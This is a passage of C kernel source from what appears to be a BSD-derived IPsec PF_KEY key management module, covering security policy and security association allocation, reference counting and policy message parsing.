%p -> KFREE()\n", __FILE__, __LINE__, (p)); \ kfree((caddr_t)(p), M_SECA); \ } while (0) #endif /* * set parameters into secpolicyindex buffer. * Must allocate secpolicyindex buffer passed to this function. */ #define KEY_SETSECSPIDX(_dir, s, d, ps, pd, ulp, idx) \ do { \ bzero((idx), sizeof(struct secpolicyindex)); \ (idx)->dir = (_dir); \ (idx)->prefs = (ps); \ (idx)->prefd = (pd); \ (idx)->ul_proto = (ulp); \ bcopy((s), &(idx)->src, ((const struct sockaddr *)(s))->sa_len); \ bcopy((d), &(idx)->dst, ((const struct sockaddr *)(d))->sa_len); \ } while (0) /* * set parameters into secasindex buffer. * Must allocate secasindex buffer before calling this function. */ #define KEY_SETSECASIDX(p, m, r, s, d, idx) \ do { \ bzero((idx), sizeof(struct secasindex)); \ (idx)->proto = (p); \ (idx)->mode = (m); \ (idx)->reqid = (r); \ bcopy((s), &(idx)->src, ((const struct sockaddr *)(s))->sa_len); \ bcopy((d), &(idx)->dst, ((const struct sockaddr *)(d))->sa_len); \ } while (0) /* key statistics */ struct _keystat { u_long getspi_count; /* the avarage of count to try to get new SPI */ } keystat; struct sadb_msghdr { struct sadb_msg *msg; struct sadb_ext *ext[SADB_EXT_MAX + 1]; int extoff[SADB_EXT_MAX + 1]; int extlen[SADB_EXT_MAX + 1]; }; static struct secasvar *key_allocsa_policy (const struct secasindex *); static void key_freesp_so (struct secpolicy **); static struct secasvar *key_do_allocsa_policy (struct secashead *, u_int); static void key_delsp (struct secpolicy *); static struct secpolicy *key_getsp (struct secpolicyindex *); static struct secpolicy *key_getspbyid (u_int32_t); static u_int32_t key_newreqid (void); static struct mbuf *key_gather_mbuf (struct mbuf *, const struct sadb_msghdr *, int, int, ...); static int key_spdadd (struct socket *, struct mbuf *, const struct sadb_msghdr *); static u_int32_t key_getnewspid (void); static int key_spddelete (struct socket *, struct mbuf *, const struct sadb_msghdr *); static int key_spddelete2 (struct socket *, struct mbuf *, const struct sadb_msghdr *); static int key_spdget (struct socket *, struct mbuf *, const struct sadb_msghdr *); static int key_spdflush (struct socket *, struct mbuf *, const struct sadb_msghdr *); static int key_spddump (struct socket *, struct mbuf *, const struct sadb_msghdr *); static struct mbuf *key_setdumpsp (struct secpolicy *, u_int8_t, u_int32_t, u_int32_t); static u_int key_getspreqmsglen (struct secpolicy *); static int key_spdexpire (struct secpolicy *); static struct secashead *key_newsah (struct secasindex *); static void key_delsah (struct secashead *); static struct secasvar *key_newsav (struct mbuf *, const struct sadb_msghdr *, struct secashead *, int *, const char*, int); #define KEY_NEWSAV(m, sadb, sah, e) \ key_newsav(m, sadb, sah, e, __FILE__, __LINE__) static void key_delsav (struct secasvar *); static struct secashead *key_getsah (struct secasindex *); static struct secasvar *key_checkspidup (struct secasindex *, u_int32_t); static struct secasvar *key_getsavbyspi (struct secashead *, u_int32_t); static int key_setsaval (struct secasvar *, struct mbuf *, const struct sadb_msghdr *); static int key_mature (struct secasvar *); static struct mbuf *key_setdumpsa (struct secasvar *, u_int8_t, u_int8_t, u_int32_t, u_int32_t); static struct mbuf *key_setsadbmsg (u_int8_t, u_int16_t, u_int8_t, u_int32_t, pid_t, u_int16_t); static struct mbuf *key_setsadbsa (struct secasvar *); static struct mbuf *key_setsadbaddr (u_int16_t, const struct sockaddr *, u_int8_t, u_int16_t); #if 0 static struct mbuf *key_setsadbident (u_int16_t, u_int16_t, caddr_t, int, u_int64_t); #endif static struct mbuf *key_setsadbxsa2 (u_int8_t, u_int32_t, u_int32_t); static struct mbuf *key_setsadbxpolicy (u_int16_t, u_int8_t, u_int32_t); static void *key_newbuf (const void *, u_int); #ifdef INET6 static int key_ismyaddr6 (struct sockaddr_in6 *); #endif /* flags for key_cmpsaidx() */ #define CMP_HEAD 1 /* protocol, addresses. */ #define CMP_MODE_REQID 2 /* additionally HEAD, reqid, mode. */ #define CMP_REQID 3 /* additionally HEAD, reaid. */ #define CMP_EXACTLY 4 /* all elements. */ static int key_cmpsaidx (const struct secasindex *, const struct secasindex *, int); static int key_cmpspidx_exactly (struct secpolicyindex *, struct secpolicyindex *); static int key_cmpspidx_withmask (struct secpolicyindex *, struct secpolicyindex *); static int key_sockaddrcmp (const struct sockaddr *, const struct sockaddr *, int); static int key_bbcmp (const void *, const void *, u_int); static void key_srandom (void); static u_int16_t key_satype2proto (u_int8_t); static u_int8_t key_proto2satype (u_int16_t); static int key_getspi (struct socket *, struct mbuf *, const struct sadb_msghdr *); static u_int32_t key_do_getnewspi (struct sadb_spirange *, struct secasindex *); static int key_update (struct socket *, struct mbuf *, const struct sadb_msghdr *); #ifdef IPSEC_DOSEQCHECK static struct secasvar *key_getsavbyseq (struct secashead *, u_int32_t); #endif static int key_add (struct socket *, struct mbuf *, const struct sadb_msghdr *); static int key_setident (struct secashead *, struct mbuf *, const struct sadb_msghdr *); static struct mbuf *key_getmsgbuf_x1 (struct mbuf *, const struct sadb_msghdr *); static int key_delete (struct socket *, struct mbuf *, const struct sadb_msghdr *); static int key_get (struct socket *, struct mbuf *, const struct sadb_msghdr *); static void key_getcomb_setlifetime (struct sadb_comb *); static struct mbuf *key_getcomb_esp (void); static struct mbuf *key_getcomb_ah (void); static struct mbuf *key_getcomb_ipcomp (void); static struct mbuf *key_getprop (const struct secasindex *); static int key_acquire (const struct secasindex *, struct secpolicy *); #ifndef IPSEC_NONBLOCK_ACQUIRE static struct secacq *key_newacq (const struct secasindex *); static struct secacq *key_getacq (const struct secasindex *); static struct secacq *key_getacqbyseq (u_int32_t); #endif static struct secspacq *key_newspacq (struct secpolicyindex *); static struct secspacq *key_getspacq (struct secpolicyindex *); static int key_acquire2 (struct socket *, struct mbuf *, const struct sadb_msghdr *); static int key_register (struct socket *, struct mbuf *, const struct sadb_msghdr *); static int key_expire (struct secasvar *); static int key_flush (struct socket *, struct mbuf *, const struct sadb_msghdr *); static int key_dump (struct socket *, struct mbuf *, const struct sadb_msghdr *); static int key_promisc (struct socket *, struct mbuf *, const struct sadb_msghdr *); static int key_senderror (struct socket *, struct mbuf *, int); static int key_validate_ext (const struct sadb_ext *, int); static int key_align (struct mbuf *, struct sadb_msghdr *); #if 0 static const char *key_getfqdn (void); static const char *key_getuserfqdn (void); #endif static void key_sa_chgstate (struct secasvar *, u_int8_t); static struct mbuf *key_alloc_mbuf (int); #define SA_ADDREF(p) do { \ (p)->refcnt++; \ KASSERT((p)->refcnt != 0, \ ("SA refcnt overflow at %s:%u", __FILE__, __LINE__)); \ } while (0) #define SA_DELREF(p) do { \ KASSERT((p)->refcnt > 0, \ ("SA refcnt underflow at %s:%u", __FILE__, __LINE__)); \ (p)->refcnt--; \ } while (0) #define SP_ADDREF(p) do { \ (p)->refcnt++; \ KASSERT((p)->refcnt != 0, \ ("SP refcnt overflow at %s:%u", __FILE__, __LINE__)); \ } while (0) #define SP_DELREF(p) do { \ KASSERT((p)->refcnt > 0, \ ("SP refcnt underflow at %s:%u", __FILE__, __LINE__)); \ (p)->refcnt--; \ } while (0) /* * Return 0 when there are known to be no SP's for the specified * direction. Otherwise return 1. This is used by IPsec code * to optimize performance. */ int key_havesp(u_int dir) { return (dir == IPSEC_DIR_INBOUND || dir == IPSEC_DIR_OUTBOUND ? LIST_FIRST(&sptree[dir]) != NULL : 1); } /* %%% IPsec policy management */ /* * allocating a SP for OUTBOUND or INBOUND packet. * Must call key_freesp() later. * OUT: NULL: not found * others: found and return the pointer. */ struct secpolicy * key_allocsp(struct secpolicyindex *spidx, u_int dir, const char* where, int tag) { struct secpolicy *sp; KASSERT(spidx != NULL, ("key_allocsp: null spidx")); KASSERT(dir == IPSEC_DIR_INBOUND || dir == IPSEC_DIR_OUTBOUND, ("key_allocsp: invalid direction %u", dir)); KEYDEBUG(KEYDEBUG_IPSEC_STAMP, kprintf("DP key_allocsp from %s:%u\n", where, tag)); /* get a SP entry */ crit_enter(); KEYDEBUG(KEYDEBUG_IPSEC_DATA, kprintf("*** objects\n"); kdebug_secpolicyindex(spidx)); LIST_FOREACH(sp, &sptree[dir], chain) { KEYDEBUG(KEYDEBUG_IPSEC_DATA, kprintf("*** in SPD\n"); kdebug_secpolicyindex(&sp->spidx)); if (sp->state == IPSEC_SPSTATE_DEAD) continue; if (key_cmpspidx_withmask(&sp->spidx, spidx)) goto found; } sp = NULL; found: if (sp) { /* sanity check */ KEY_CHKSPDIR(sp->spidx.dir, dir, "key_allocsp"); /* found a SPD entry */ sp->lastused = time_second; SP_ADDREF(sp); } crit_exit(); KEYDEBUG(KEYDEBUG_IPSEC_STAMP, kprintf("DP key_allocsp return SP:%p (ID=%u) refcnt %u\n", sp, sp ? sp->id : 0, sp ? sp->refcnt : 0)); return sp; } /* * allocating a SP for OUTBOUND or INBOUND packet. * Must call key_freesp() later. * OUT: NULL: not found * others: found and return the pointer. */ struct secpolicy * key_allocsp2(u_int32_t spi, union sockaddr_union *dst, u_int8_t proto, u_int dir, const char* where, int tag) { struct secpolicy *sp; KASSERT(dst != NULL, ("key_allocsp2: null dst")); KASSERT(dir == IPSEC_DIR_INBOUND || dir == IPSEC_DIR_OUTBOUND, ("key_allocsp2: invalid direction %u", dir)); KEYDEBUG(KEYDEBUG_IPSEC_STAMP, kprintf("DP key_allocsp2 from %s:%u\n", where, tag)); /* get a SP entry */ crit_enter(); KEYDEBUG(KEYDEBUG_IPSEC_DATA, kprintf("*** objects\n"); kprintf("spi %u proto %u dir %u\n", spi, proto, dir); kdebug_sockaddr(&dst->sa)); LIST_FOREACH(sp, &sptree[dir], chain) { KEYDEBUG(KEYDEBUG_IPSEC_DATA, kprintf("*** in SPD\n"); kdebug_secpolicyindex(&sp->spidx)); if (sp->state == IPSEC_SPSTATE_DEAD) continue; /* compare simple values, then dst address */ if (sp->spidx.ul_proto != proto) continue; /* NB: spi's must exist and match */ if (!sp->req || !sp->req->sav || sp->req->sav->spi != spi) continue; if (key_sockaddrcmp(&sp->spidx.dst.sa, &dst->sa, 1) == 0) goto found; } sp = NULL; found: if (sp) { /* sanity check */ KEY_CHKSPDIR(sp->spidx.dir, dir, "key_allocsp2"); /* found a SPD entry */ sp->lastused = time_second; SP_ADDREF(sp); } crit_exit(); KEYDEBUG(KEYDEBUG_IPSEC_STAMP, kprintf("DP key_allocsp2 return SP:%p (ID=%u) refcnt %u\n", sp, sp ? sp->id : 0, sp ? sp->refcnt : 0)); return sp; } /* * return a policy that matches this particular inbound packet. * XXX slow */ struct secpolicy * key_gettunnel(const struct sockaddr *osrc, const struct sockaddr *odst, const struct sockaddr *isrc, const struct sockaddr *idst, const char* where, int tag) { struct secpolicy *sp; const int dir = IPSEC_DIR_INBOUND; struct ipsecrequest *r1, *r2, *p; struct secpolicyindex spidx; KEYDEBUG(KEYDEBUG_IPSEC_STAMP, kprintf("DP key_gettunnel from %s:%u\n", where, tag)); if (isrc->sa_family != idst->sa_family) { ipseclog((LOG_ERR, "protocol family mismatched %d != %d\n.", isrc->sa_family, idst->sa_family)); sp = NULL; goto done; } crit_enter(); LIST_FOREACH(sp, &sptree[dir], chain) { if (sp->state == IPSEC_SPSTATE_DEAD) continue; r1 = r2 = NULL; for (p = sp->req; p; p = p->next) { if (p->saidx.mode != IPSEC_MODE_TUNNEL) continue; r1 = r2; r2 = p; if (!r1) { /* here we look at address matches only */ spidx = sp->spidx; if (isrc->sa_len > sizeof(spidx.src) || idst->sa_len > sizeof(spidx.dst)) continue; bcopy(isrc, &spidx.src, isrc->sa_len); bcopy(idst, &spidx.dst, idst->sa_len); if (!key_cmpspidx_withmask(&sp->spidx, &spidx)) continue; } else { if (key_sockaddrcmp(&r1->saidx.src.sa, isrc, 0) || key_sockaddrcmp(&r1->saidx.dst.sa, idst, 0)) continue; } if (key_sockaddrcmp(&r2->saidx.src.sa, osrc, 0) || key_sockaddrcmp(&r2->saidx.dst.sa, odst, 0)) continue; goto found; } } sp = NULL; found: if (sp) { sp->lastused = time_second; SP_ADDREF(sp); } crit_exit(); done: KEYDEBUG(KEYDEBUG_IPSEC_STAMP, kprintf("DP key_gettunnel return SP:%p (ID=%u) refcnt %u\n", sp, sp ? sp->id : 0, sp ? sp->refcnt : 0)); return sp; } /* * allocating an SA entry for an *OUTBOUND* packet. * checking each request entries in SP, and acquire an SA if need. * OUT: 0: there are valid requests. * ENOENT: policy may be valid, but SA with REQUIRE is on acquiring. */ int key_checkrequest(struct ipsecrequest *isr, const struct secasindex *saidx) { u_int level; int error; KASSERT(isr != NULL, ("key_checkrequest: null isr")); KASSERT(saidx != NULL, ("key_checkrequest: null saidx")); KASSERT(saidx->mode == IPSEC_MODE_TRANSPORT || saidx->mode == IPSEC_MODE_TUNNEL, ("key_checkrequest: unexpected policy %u", saidx->mode)); /* get current level */ level = ipsec_get_reqlevel(isr); /* * XXX guard against protocol callbacks from the crypto * thread as they reference ipsecrequest.sav which we * temporarily null out below. Need to rethink how we * handle bundled SA's in the callback thread. */ #if 0 /* * We do allocate new SA only if the state of SA in the holder is * SADB_SASTATE_DEAD. The SA for outbound must be the oldest. */ if (isr->sav != NULL) { if (isr->sav->sah == NULL) panic("key_checkrequest: sah is null.\n"); if (isr->sav == (struct secasvar *)LIST_FIRST( &isr->sav->sah->savtree[SADB_SASTATE_DEAD])) { KEY_FREESAV(&isr->sav); isr->sav = NULL; } } #else /* * we free any SA stashed in the IPsec request because a different * SA may be involved each time this request is checked, either * because new SAs are being configured, or this request is * associated with an unconnected datagram socket, or this request * is associated with a system default policy. * * The operation may have negative impact to performance. We may * want to check cached SA carefully, rather than picking new SA * every time. */ if (isr->sav != NULL) { KEY_FREESAV(&isr->sav); isr->sav = NULL; } #endif /* * new SA allocation if no SA found. * key_allocsa_policy should allocate the oldest SA available. * See key_do_allocsa_policy(), and draft-jenkins-ipsec-rekeying-03.txt. */ if (isr->sav == NULL) isr->sav = key_allocsa_policy(saidx); /* When there is SA. */ if (isr->sav != NULL) { if (isr->sav->state != SADB_SASTATE_MATURE && isr->sav->state != SADB_SASTATE_DYING) return EINVAL; return 0; } /* there is no SA */ error = key_acquire(saidx, isr->sp); if (error != 0) { /* XXX What should I do ? */ ipseclog((LOG_DEBUG, "key_checkrequest: error %d returned " "from key_acquire.\n", error)); return error; } if (level != IPSEC_LEVEL_REQUIRE) { /* XXX sigh, the interface to this routine is botched */ KASSERT(isr->sav == NULL, ("key_checkrequest: unexpected SA")); return 0; } else { return ENOENT; } } /* * allocating a SA for policy entry from SAD. * NOTE: searching SAD of aliving state. * OUT: NULL: not found. * others: found and return the pointer. */ static struct secasvar * key_allocsa_policy(const struct secasindex *saidx) { struct secashead *sah; struct secasvar *sav; u_int stateidx, state; LIST_FOREACH(sah, &sahtree, chain) { if (sah->state == SADB_SASTATE_DEAD) continue; if (key_cmpsaidx(&sah->saidx, saidx, CMP_MODE_REQID)) goto found; } return NULL; found: /* search valid state */ for (stateidx = 0; stateidx < NELEM(saorder_state_valid); stateidx++) { state = saorder_state_valid[stateidx]; sav = key_do_allocsa_policy(sah, state); if (sav != NULL) return sav; } return NULL; } /* * searching SAD with direction, protocol, mode and state. * called by key_allocsa_policy(). * OUT: * NULL : not found * others : found, pointer to a SA. */ static struct secasvar * key_do_allocsa_policy(struct secashead *sah, u_int state) { struct secasvar *sav, *nextsav, *candidate = NULL, *d; LIST_FOREACH_MUTABLE(sav, &sah->savtree[state], chain, nextsav) { /* sanity check */ KEY_CHKSASTATE(sav->state, state, "key_do_allocsa_policy"); /* initialize */ if (candidate == NULL) { candidate = sav; continue; } /* Which SA is the better ? */ /* sanity check 2 */ if (candidate->lft_c == NULL || sav->lft_c == NULL) panic("key_do_allocsa_policy: " "lifetime_current is NULL.\n"); /* What the best method is to compare ? */ if (key_prefered_oldsa) { if (candidate->lft_c->sadb_lifetime_addtime > sav->lft_c->sadb_lifetime_addtime) { candidate = sav; } continue; } /* prefered new sa rather than old sa */ if (candidate->lft_c->sadb_lifetime_addtime < sav->lft_c->sadb_lifetime_addtime) { d = candidate; candidate = sav; } else d = sav; /* * prepared to delete the SA when there is more * suitable candidate and the lifetime of the SA is not * permanent. */ if (d->lft_c->sadb_lifetime_addtime != 0) { struct mbuf *m, *result; u_int8_t satype; key_sa_chgstate(d, SADB_SASTATE_DEAD); KASSERT(d->refcnt > 0, ("key_do_allocsa_policy: bogus ref count")); satype = key_proto2satype(d->sah->saidx.proto); if (satype == 0) goto msgfail; m = key_setsadbmsg(SADB_DELETE, 0, satype, 0, 0, d->refcnt - 1); if (!m) goto msgfail; result = m; /* set sadb_address for saidx's. */ m = key_setsadbaddr(SADB_EXT_ADDRESS_SRC, &d->sah->saidx.src.sa, d->sah->saidx.src.sa.sa_len << 3, IPSEC_ULPROTO_ANY); if (!m) goto msgfail; m_cat(result, m); /* set sadb_address for saidx's. */ m = key_setsadbaddr(SADB_EXT_ADDRESS_DST, &d->sah->saidx.dst.sa, d->sah->saidx.dst.sa.sa_len << 3, IPSEC_ULPROTO_ANY); if (!m) goto msgfail; m_cat(result, m); /* create SA extension */ m = key_setsadbsa(d); if (!m) goto msgfail; m_cat(result, m); if (result->m_len < sizeof(struct sadb_msg)) { result = m_pullup(result, sizeof(struct sadb_msg)); if (result == NULL) goto msgfail; } result->m_pkthdr.len = m_lengthm(result, NULL); mtod(result, struct sadb_msg *)->sadb_msg_len = PFKEY_UNIT64(result->m_pkthdr.len); if (key_sendup_mbuf(NULL, result, KEY_SENDUP_REGISTERED)) goto msgfail; msgfail: KEY_FREESAV(&d); } } if (candidate) { SA_ADDREF(candidate); KEYDEBUG(KEYDEBUG_IPSEC_STAMP, kprintf("DP allocsa_policy cause refcnt++:%d SA:%p\n", candidate->refcnt, candidate)); } return candidate; } /* * allocating a usable SA entry for a *INBOUND* packet. * Must call key_freesav() later. * OUT: positive: pointer to a usable sav (i.e. MATURE or DYING state). * NULL: not found, or error occured. * * In the comparison, no source address is used--for RFC2401 conformance. * To quote, from section 4.1: * A security association is uniquely identified by a triple consisting * of a Security Parameter Index (SPI), an IP Destination Address, and a * security protocol (AH or ESP) identifier. * Note that, however, we do need to keep source address in IPsec SA. * IKE specification and PF_KEY specification do assume that we * keep source address in IPsec SA. We see a tricky situation here. */ struct secasvar * key_allocsa( union sockaddr_union *dst, u_int proto, u_int32_t spi, const char* where, int tag) { struct secashead *sah; struct secasvar *sav; u_int stateidx, state; KASSERT(dst != NULL, ("key_allocsa: null dst address")); KEYDEBUG(KEYDEBUG_IPSEC_STAMP, kprintf("DP key_allocsa from %s:%u\n", where, tag)); /* * searching SAD. * XXX: to be checked internal IP header somewhere. Also when * IPsec tunnel packet is received. But ESP tunnel mode is * encrypted so we can't check internal IP header. */ crit_enter(); LIST_FOREACH(sah, &sahtree, chain) { /* search valid state */ for (stateidx = 0; stateidx < NELEM(saorder_state_valid); stateidx++) { state = saorder_state_valid[stateidx]; LIST_FOREACH(sav, &sah->savtree[state], chain) { /* sanity check */ KEY_CHKSASTATE(sav->state, state, "key_allocsav"); /* do not return entries w/ unusable state */ if (sav->state != SADB_SASTATE_MATURE && sav->state != SADB_SASTATE_DYING) continue; if (proto != sav->sah->saidx.proto) continue; if (spi != sav->spi) continue; #if 0 /* don't check src */ /* check src address */ if (key_sockaddrcmp(&src->sa, &sav->sah->saidx.src.sa, 0) != 0) continue; #endif /* check dst address */ if (key_sockaddrcmp(&dst->sa, &sav->sah->saidx.dst.sa, 0) != 0) continue; SA_ADDREF(sav); goto done; } } } sav = NULL; done: crit_exit(); KEYDEBUG(KEYDEBUG_IPSEC_STAMP, kprintf("DP key_allocsa return SA:%p; refcnt %u\n", sav, sav ? sav->refcnt : 0)); return sav; } /* * Must be called after calling key_allocsp(). * For both the packet without socket and key_freeso(). */ void _key_freesp(struct secpolicy **spp, const char* where, int tag) { struct secpolicy *sp = *spp; KASSERT(sp != NULL, ("key_freesp: null sp")); SP_DELREF(sp); KEYDEBUG(KEYDEBUG_IPSEC_STAMP, kprintf("DP key_freesp SP:%p (ID=%u) from %s:%u; refcnt now %u\n", sp, sp->id, where, tag, sp->refcnt)); if (sp->refcnt == 0) { *spp = NULL; key_delsp(sp); } } /* * Must be called after calling key_allocsp(). * For the packet with socket. */ void key_freeso(struct socket *so) { /* sanity check */ KASSERT(so != NULL, ("key_freeso: null so")); switch (so->so_proto->pr_domain->dom_family) { #ifdef INET case PF_INET: { struct inpcb *pcb = so->so_pcb; /* Does it have a PCB ? */ if (pcb == NULL) return; key_freesp_so(&pcb->inp_sp->sp_in); key_freesp_so(&pcb->inp_sp->sp_out); } break; #endif #ifdef INET6 case PF_INET6: { #ifdef HAVE_NRL_INPCB struct inpcb *pcb = so->so_pcb; /* Does it have a PCB ? */ if (pcb == NULL) return; key_freesp_so(&pcb->inp_sp->sp_in); key_freesp_so(&pcb->inp_sp->sp_out); #else struct in6pcb *pcb = so->so_pcb; /* Does it have a PCB ? */ if (pcb == NULL) return; key_freesp_so(&pcb->in6p_sp->sp_in); key_freesp_so(&pcb->in6p_sp->sp_out); #endif } break; #endif /* INET6 */ default: ipseclog((LOG_DEBUG, "key_freeso: unknown address family=%d.\n", so->so_proto->pr_domain->dom_family)); return; } } static void key_freesp_so(struct secpolicy **sp) { KASSERT(sp != NULL && *sp != NULL, ("key_freesp_so: null sp")); if ((*sp)->policy == IPSEC_POLICY_ENTRUST || (*sp)->policy == IPSEC_POLICY_BYPASS) return; KASSERT((*sp)->policy == IPSEC_POLICY_IPSEC, ("key_freesp_so: invalid policy %u", (*sp)->policy)); KEY_FREESP(sp); } /* * Must be called after calling key_allocsa(). * This function is called by key_freesp() to free some SA allocated * for a policy. */ void key_freesav(struct secasvar **psav, const char* where, int tag) { struct secasvar *sav = *psav; KASSERT(sav != NULL, ("key_freesav: null sav")); SA_DELREF(sav); KEYDEBUG(KEYDEBUG_IPSEC_STAMP, kprintf("DP key_freesav SA:%p (SPI %u) from %s:%u; refcnt now %u\n", sav, ntohl(sav->spi), where, tag, sav->refcnt)); if (sav->refcnt == 0) { *psav = NULL; key_delsav(sav); } } /* %%% SPD management */ /* * free security policy entry. */ static void key_delsp(struct secpolicy *sp) { KASSERT(sp != NULL, ("key_delsp: null sp")); sp->state = IPSEC_SPSTATE_DEAD; KASSERT(sp->refcnt == 0, ("key_delsp: SP with references deleted (refcnt %u)", sp->refcnt)); crit_enter(); /* remove from SP index */ if (__LIST_CHAINED(sp)) LIST_REMOVE(sp, chain); { struct ipsecrequest *isr = sp->req, *nextisr; while (isr != NULL) { if (isr->sav != NULL) { KEY_FREESAV(&isr->sav); isr->sav = NULL; } nextisr = isr->next; KFREE(isr); isr = nextisr; } } KFREE(sp); crit_exit(); } /* * search SPD * OUT: NULL : not found * others : found, pointer to a SP. */ static struct secpolicy * key_getsp(struct secpolicyindex *spidx) { struct secpolicy *sp; KASSERT(spidx != NULL, ("key_getsp: null spidx")); LIST_FOREACH(sp, &sptree[spidx->dir], chain) { if (sp->state == IPSEC_SPSTATE_DEAD) continue; if (key_cmpspidx_exactly(spidx, &sp->spidx)) { SP_ADDREF(sp); return sp; } } return NULL; } /* * get SP by index. * OUT: NULL : not found * others : found, pointer to a SP. */ static struct secpolicy * key_getspbyid(u_int32_t id) { struct secpolicy *sp; LIST_FOREACH(sp, &sptree[IPSEC_DIR_INBOUND], chain) { if (sp->state == IPSEC_SPSTATE_DEAD) continue; if (sp->id == id) { SP_ADDREF(sp); return sp; } } LIST_FOREACH(sp, &sptree[IPSEC_DIR_OUTBOUND], chain) { if (sp->state == IPSEC_SPSTATE_DEAD) continue; if (sp->id == id) { SP_ADDREF(sp); return sp; } } return NULL; } struct secpolicy * key_newsp(const char* where, int tag) { struct secpolicy *newsp = NULL; newsp = kmalloc(sizeof(struct secpolicy), M_SECA, M_INTWAIT | M_ZERO | M_NULLOK); if (newsp) { newsp->refcnt = 1; newsp->req = NULL; } KEYDEBUG(KEYDEBUG_IPSEC_STAMP, kprintf("DP key_newsp from %s:%u return SP:%p\n", where, tag, newsp)); return newsp; } /* * create secpolicy structure from sadb_x_policy structure. * NOTE: `state', `secpolicyindex' in secpolicy structure are not set, * so must be set properly later. */ struct secpolicy * key_msg2sp(struct sadb_x_policy *xpl0, size_t len, int *error) { struct secpolicy *newsp; /* sanity check */ if (xpl0 == NULL) panic("key_msg2sp: NULL pointer was passed.\n"); if (len < sizeof(*xpl0)) panic("key_msg2sp: invalid length.\n"); if (len != PFKEY_EXTLEN(xpl0)) { ipseclog((LOG_DEBUG, "key_msg2sp: Invalid msg length.\n")); *error = EINVAL; return NULL; } if ((newsp = KEY_NEWSP()) == NULL) { *error = ENOBUFS; return NULL; } newsp->spidx.dir = xpl0->sadb_x_policy_dir; newsp->policy = xpl0->sadb_x_policy_type; /* check policy */ switch (xpl0->sadb_x_policy_type) { case IPSEC_POLICY_DISCARD: case IPSEC_POLICY_NONE: case IPSEC_POLICY_ENTRUST: case IPSEC_POLICY_BYPASS: newsp->req = NULL; break; case IPSEC_POLICY_IPSEC: { int tlen; struct sadb_x_ipsecrequest *xisr; struct ipsecrequest **p_isr = &newsp->req; /* validity check */ if (PFKEY_EXTLEN(xpl0) < sizeof(*xpl0)) { ipseclog((LOG_DEBUG, "key_msg2sp: Invalid msg length.\n")); KEY_FREESP(&newsp); *error = EINVAL; return NULL; } tlen = PFKEY_EXTLEN(xpl0) - sizeof(*xpl0); xisr = (struct sadb_x_ipsecrequest *)(xpl0 + 1); while (tlen > 0) { /* length check */ if (xisr->sadb_x_ipsecrequest_len < sizeof(*xisr)) { ipseclog((LOG_DEBUG, "key_msg2sp: " "invalid ipsecrequest length.\n")); KEY_FREESP(&newsp); *error = EINVAL; return NULL; } /* allocate request buffer */ KMALLOC(*p_isr, struct ipsecrequest *, sizeof(**p_isr)); if ((*p_isr) == NULL) { ipseclog((LOG_DEBUG, "key_msg2sp: No more memory.\n")); KEY_FREESP(&newsp); *error = ENOBUFS; return NULL; } bzero(*p_isr, sizeof(**p_isr)); /* set values */ (*p_isr)->next = NULL; switch (xisr->sadb_x_ipsecrequest_proto) { case IPPROTO_ESP: case IPPROTO_AH: case IPPROTO_IPCOMP: break; default: ipseclog((LOG_DEBUG, "key_msg2sp: invalid proto type=%u\n", xisr->sadb_x_ipsecrequest_proto)); KEY_FREESP(&newsp); *error = EPROTONOSUPPORT; return NULL; } (*p_isr)->saidx.proto = xisr->sadb_x_ipsecrequest_proto; switch (xisr->sadb_x_ipsecrequest_mode) { case IPSEC_MODE_TRANSPORT: case IPSEC_MODE_TUNNEL: break; case IPSEC_MODE_ANY: default: ipseclog((LOG_DEBUG, "key_msg2sp: invalid mode=%u\n", xisr->sadb_x_ipsecrequest_mode)); KEY_FREESP(&newsp); *error = EINVAL; return NULL; } (*p_isr)->saidx.mode = xisr->sadb_x_ipsecrequest_mode; switch (xisr->sadb_x_ipsecrequest_level) { case IPSEC_LEVEL_DEFAULT: case IPSEC_LEVEL_USE: case IPSEC_LEVEL_REQUIRE: break; case IPSEC_LEVEL_UNIQUE: /* validity check */ /* * If range violation of reqid, kernel will * update it, don't refuse it. */ if (xisr->sadb_x_ipsecrequest_reqid > IPSEC_MANUAL_REQID_MAX) { ipseclog((LOG_DEBUG, "key_msg2sp: reqid=%d range " "violation, updated by kernel.\n", xisr->sadb_x_ipsecrequest_reqid)); xisr->sadb_x_ipsecrequest_reqid = 0; } /* allocate new reqid id if reqid is zero. */ if (xisr->sadb_x_ipsecrequest_reqid == 0) { u_int32_t reqid; if ((reqid = key_newreqid()) == 0) { KEY_FREESP(&newsp); *error = ENOBUFS; return NULL; } (*p_isr)->saidx.reqid = reqid; xisr->sadb_x_ipsecrequest_reqid = reqid; } else { /* set it for manual keying. */ (*p_isr)->saidx.reqid = xisr->sadb_x_ipsecrequest_reqid; } break; default: ipseclog((LOG_DEBUG, "key_msg2sp: invalid level=%u\n", xisr->sadb_x_ipsecrequest_level)); KEY_FREESP(&newsp); *error = EINVAL; return NULL; } (*p_isr)->level = xisr->sadb_x_ipsecrequest_level; /* set IP addresses if there */ if (xisr->sadb_x_ipsecrequest_len > sizeof(*xisr)) { struct sockaddr *paddr; paddr = (struct sockaddr *)(xisr + 1); /* validity check */ if (paddr->sa_len > sizeof((*p_isr)->saidx.src)) { ipseclog((LOG_DEBUG, "key_msg2sp: invalid request " "address length.\n")); KEY_FREESP(&newsp); *error = EINVAL; return NULL; } bcopy(paddr, &(*p_isr)->saidx.src, paddr->sa_len); paddr = (struct sockaddr *)((caddr_t)paddr + paddr->sa_len); /* validity check */ if (paddr->sa_len > sizeof((*p_isr)->saidx.dst)) { ipseclog((LOG_DEBUG, "key_msg2sp: invalid request " "address length.\n")); KEY_FREESP(&newsp); *error = EINVAL; return NULL; } bcopy(paddr, &(*p_isr)->saidx.dst, paddr->sa_len); } (*p_isr)->sav = NULL; (*p_isr)->sp = newsp; /* initialization for the next. */ p_isr = &(*p_isr)->next; tlen -= xisr->sadb_x_ipsecrequest_len; /* validity check */ if (tlen < 0) { ipseclog((LOG_DEBUG, "key_msg2sp: becoming tlen < 0.\n")); KEY_FREESP(&newsp); *error = EINVAL; return NULL; } xisr = (struct sadb_x_ipsecrequest *)((caddr_t)xisr + xisr->sadb_x_ipsecrequest_len); } } break; default: ipseclog((LOG_DEBUG, "key_msg2sp: invalid policy type.\n")); KEY_FREESP(&newsp); *error = EINVAL; return NULL; } *error = 0; return newsp; } static u_int32_t key_newreqid(void) { static u_int32_t auto_reqid = IPSEC_MANUAL_REQID_MAX + 1; auto_reqid = (auto_reqid == ~0 ? IPSEC_MANUAL_REQID_MAX + 1 : auto_reqid + 1); /* XXX should be unique check */ return auto_reqid; } /* * copy secpolicy struct to sadb_x_policy structure indicated. */ struct mbuf * key_sp2msg(struct secpolicy *sp) { struct sadb_x_policy *xpl; int tlen; caddr_t p; struct mbuf *m; 